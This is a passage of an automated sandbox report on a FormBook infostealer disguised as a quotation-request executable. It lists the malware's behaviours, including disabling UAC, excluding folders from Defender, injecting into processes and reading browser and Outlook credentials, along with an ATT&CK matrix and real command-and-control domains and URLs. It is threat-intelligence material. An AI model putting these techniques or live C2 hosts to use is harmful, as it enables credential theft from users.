            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disables UAC (registry)
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\SecEdit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		11
            Registry Run Keys / Startup Folder            		512
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		21
            Disable or Modify Tools            		LSASS Memory231
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Registry Run Keys / Startup Folder            		41
            Virtualization/Sandbox Evasion            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		512
            Process Injection            		NTDS41
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSync113
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Rundll32            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509644 Sample: z27PEDIDOSDECOTIZACI__N___s... Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 44 www.grafiktema.xyz 2->44 46 xiaoyue.zhuangkou.com 2->46 48 21 other IPs or domains 2->48 56 Suricata IDS alerts for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 64 11 other signatures 2->64 10 z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe 1 3 2->10         started        13 wab.exe 3 1 2->13         started        15 rundll32.exe 2->15         started        17 wab.exe 2->17         started        signatures3 62 Performs DNS queries to domains with low reputation 44->62 process4 signatures5 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->80 82 Writes to foreign memory regions 10->82 84 Adds a directory exclusion to Windows Defender 10->84 86 2 other signatures 10->86 19 wab.exe 10->19         started        22 powershell.exe 23 10->22         started        24 WerFault.exe 19 16 10->24         started        26 wab.exe 10->26         started        process6 signatures7 66 Maps a DLL or memory area into another process 19->66 28 sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe 19->28 injected 68 Loading BitLocker PowerShell Module 22->68 31 WmiPrvSE.exe 22->31         started        33 conhost.exe 22->33         started        process8 signatures9 88 Found direct / indirect Syscall (likely to bypass EDR) 28->88 35 SecEdit.exe 1 13 28->35         started        process10 signatures11 70 Tries to steal Mail credentials (via file / registry access) 35->70 72 Creates autostart registry keys with suspicious names 35->72 74 Tries to harvest and steal browser information (history, passwords, etc) 35->74 76 4 other signatures 35->76 38 sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe 35->38 injected 42 firefox.exe 35->42         started        process12 dnsIp13 50 www.drivemktg.co 193.108.130.23, 49717, 49718, 49719 SVK-ASCZ Russian Federation 38->50 52 parkingpage.namecheap.com 91.195.240.19, 49733, 49734, 49735 SEDO-ASDE Germany 38->52 54 8 other IPs or domains 38->54 78 Found direct / indirect Syscall (likely to bypass EDR) 38->78 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe37%ReversingLabsWin32.Trojan.Generic
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe100%AviraTR/AD.Swotter.ecpvo
            z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.54bxd.cyou/qii2/0%Avira URL Cloudsafe
            http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/0%Avira URL Cloudsafe
            http://www.54bxd.cyou/qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF80%Avira URL Cloudsafe
            http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ10%Avira URL Cloudsafe
            http://www.grafiktema.xyz/pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF80%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            http://www.aceautocorp.com/9og3/100%Avira URL Cloudmalware
            http://www.vacaturecast.com/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF80%Avira URL Cloudsafe
            http://www.cr-pos.com/o1v8/0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.purpleheartlacey.com/rlev/100%Avira URL Cloudmalware
            http://www.fardvuss.top/oxoz/0%Avira URL Cloudsafe
            http://www.bitmapsportsbook.com/zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF80%Avira URL Cloudsafe
            http://www.purpleheartlacey.com/rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8100%Avira URL Cloudmalware
            http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK100%Avira URL Cloudmalware
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            http://www.drivemktg.co/6iyv/0%Avira URL Cloudsafe
            http://www.bitmapsportsbook.com/zwgt/0%Avira URL Cloudsafe
            http://www.drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF80%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=goodgiftguru.com0%Avira URL Cloudsafe
            http://www.vacaturecast.com/sid8/0%Avira URL Cloudsafe
            http://www.goodgiftguru.com/p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8100%Avira URL Cloudmalware
            http://www.nbh6agr8h.sbs/bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF80%Avira URL Cloudsafe
            http://www.cr-pos.com0%Avira URL Cloudsafe
            http://www.nbh6agr8h.sbs/bqpw/0%Avira URL Cloudsafe
            http://www.trcrb8e8m.sbs/d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF80%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.grafiktema.xyz/pt32/0%Avira URL Cloudsafe
            http://www.r7xzr3ib0.sbs/zqqa/0%Avira URL Cloudsafe
            http://www.fardvuss.top/oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF80%Avira URL Cloudsafe
            http://www.trcrb8e8m.sbs/d8su/0%Avira URL Cloudsafe
            http://www.cr-pos.com/o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF80%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            		217.70.184.50
            		truetrue
              		unknown
              www.54bxd.cyou
              		154.213.157.32
              		truetrue
                		unknown
                www.fardvuss.top
                		199.192.19.19
                		truetrue
                  		unknown
                  vacaturecast.com
                  		91.184.0.111
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truetrue
                      		unknown
                      cr-pos.com
                      		192.250.231.28
                      		truetrue
                        		unknown
                        www.drivemktg.co
                        		193.108.130.23
                        		truetrue
                          		unknown
                          xiaoyue.zhuangkou.com
                          		47.239.13.172
                          		truetrue
                            		unknown
                            grafiktema.xyz
                            		31.186.11.254
                            		truetrue
                              		unknown
                              aceautocorp.com
                              		198.12.241.35
                              		truetrue
                                		unknown
                                www.r7xzr3ib0.sbs
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.nbh6agr8h.sbs
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.vacaturecast.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.purpleheartlacey.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.cityrentsatruck.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.cr-pos.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.sulpapeis.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.grafiktema.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.goodgiftguru.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.bitmapsportsbook.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.trcrb8e8m.sbs
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.aceautocorp.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.make-l.ru
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.vacaturecast.com/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cr-pos.com/o1v8/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.54bxd.cyou/qii2/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.54bxd.cyou/qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.grafiktema.xyz/pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aceautocorp.com/9og3/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.bitmapsportsbook.com/zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fardvuss.top/oxoz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.purpleheartlacey.com/rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.purpleheartlacey.com/rlev/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.bitmapsportsbook.com/zwgt/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.drivemktg.co/6iyv/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vacaturecast.com/sid8/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.goodgiftguru.com/p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.nbh6agr8h.sbs/bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.nbh6agr8h.sbs/bqpw/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.trcrb8e8m.sbs/d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.grafiktema.xyz/pt32/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.r7xzr3ib0.sbs/zqqa/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fardvuss.top/oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.trcrb8e8m.sbs/d8su/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cr-pos.com/o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF8true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1SecEdit.exe, 0000000C.00000002.3793502568.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000399C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/chrome_newtabSecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000380A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssSecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://upx.sf.netAmcache.hve.8.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.gandi.net/en/domainSecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOKSecEdit.exe, 0000000C.00000002.3793502568.00000000047D6000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000004176000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=SecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsSecEdit.exe, 0000000C.00000002.3793502568.0000000003CD8000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000003678000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://whois.gandi.net/en/results?search=goodgiftguru.comSecEdit.exe, 0000000C.00000002.3793502568.0000000003B46000.00000004.10000000.00040000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3795835777.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.00000000034E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001FF56000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecEdit.exe, 0000000C.00000002.3795946825.0000000007992000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
